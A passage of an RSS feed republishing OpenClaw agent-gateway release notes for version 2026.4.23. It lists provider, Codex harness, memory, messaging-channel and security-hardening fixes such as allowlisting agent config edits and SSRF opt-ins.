<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.4.23 beta 5]]></title>
<description><![CDATA[2026.4.23
Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models...]]></description>
<link>https://tsecurity.de/de/3460952/downloads/openclaw-2026423-beta-5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460952/downloads/openclaw-2026423-beta-5/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:32 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.23</h2>
<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
